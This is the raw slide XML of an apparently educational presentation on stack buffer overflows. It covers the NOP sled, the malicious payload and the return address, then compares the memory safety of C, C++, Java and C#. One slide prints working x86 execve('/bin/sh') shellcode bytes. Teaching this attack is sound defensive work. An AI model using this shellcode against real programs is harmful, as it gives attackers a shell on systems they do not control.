            <a:ext cx="323850" cy="5667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FB7D1-5985-659F-7164-61F7B543FA73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449925" y="1998445"/>
            <a:ext cx="2516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8 bytes : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>fill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t> the buffer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6031EE0-0AC9-9F26-46A5-029160243A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3903875">
            <a:off x="3186111" y="2700985"/>
            <a:ext cx="323850" cy="5667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04931-EF85-D633-AEE5-F77EC626D265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759487" y="2583657"/>
            <a:ext cx="2740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NO-OP in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> code</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="1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6856DCF-4138-F1A5-FDC3-74731018AA18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6772700">
            <a:off x="3187303" y="3512570"/>
            <a:ext cx="323850" cy="5667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A74AA-08A9-E5BA-228A-FE1B505DE733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759486" y="3921413"/>
            <a:ext cx="5232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Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>...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executed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> "as if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was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>compiled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> code"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1020613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BD36-E0B0-4394-E4B2-01BF1EB1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38"/>
            <a:ext cx="10515600" cy="1019176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Decompiling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Assembly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57304-FA2C-288B-1DA9-FF3E7599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" y="1090614"/>
            <a:ext cx="6312124" cy="4124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BD648E-C54E-D46F-A66A-83DB5844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24" y="3305039"/>
            <a:ext cx="5880376" cy="348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91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9D0B9-DC13-1722-E889-F7DCCF14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decoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StackOverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Payload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7B7F2-1E3E-B187-4571-992E3753EF74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2043798"/>
            <a:ext cx="10401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\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>\x80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56501-40A9-3EAF-B3F0-2ACA84D08F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4118252" y="2496742"/>
            <a:ext cx="647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 =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="32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4617E-EAA2-EC34-478C-6DC0E89A8560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3167062" y="3288240"/>
            <a:ext cx="3754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{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>("/bin/sh") ;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783BCB-C57D-2E78-3AC4-477D3C934036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088600" y="4040239"/>
            <a:ext cx="647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 =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3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4F7194-9605-420C-01F5-DCE6CF3BFC90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995486" y="4643351"/>
            <a:ext cx="74230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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>mutated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>become</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> a Shell,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> full control over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>redirected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>shell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0957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4D701-CCE6-ED20-ECF5-E8F9E73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Explanation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> of  Stack / Return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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75BA1-E466-6061-DADF-67213415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529" y="2282038"/>
            <a:ext cx="6248942" cy="349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35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D58ED-99A2-7F01-A1A2-794673CD2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8143-D709-C396-D986-5E913E425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69849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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>hy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> ??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109F8-FC12-5747-19C3-37BD39F58567}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1285876" y="1750557"/>
            <a:ext cx="102366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And </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>still</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>appear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>years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Despite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> (Runtime Bound Checker, Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>, etc...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>Assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>, C, C++,  ...  are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>unsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> langages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>prone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> for memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>managment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>,  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>pointers, and  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>methods</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/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58087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79D3D-609E-5A7F-EAE1-341B287F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"/>
            <a:ext cx="10515600" cy="1057276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Langages?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D8418-5B4D-73C1-37B5-385C38E1B85D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1504949" y="923926"/>
            <a:ext cx="10634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C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>partially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> solve the  C  printf() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>adding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  "cout &lt;&lt;" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>formatting</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>C++ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>avoided</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> few of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>problems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> of C,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references</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> and type-checking, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>instead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> of "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>*" and  "&amp;data", "*pointer"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>fully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>resolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>raise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> Exception at runtime: "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>ArrayIndexOutOfBoundException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  Java has </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  - a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>strongly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>typed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>mathematically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>proven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>) memory model, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> Classes, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>bytecode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  - a Garbage-Collector (runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>overcost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  - a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>separation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> and Stack, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>never</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>allocate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>nor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> on Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  =&gt; runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>overcost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>wrapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, primitives.. GC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>overhead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
              <a:t>C#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>partially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>solved</a:t>
            </a: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of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>problems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> of Java, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>allowing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>", and argument/return by copy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>  C# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>still</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>too</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> native code, not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>bytecode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>   and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
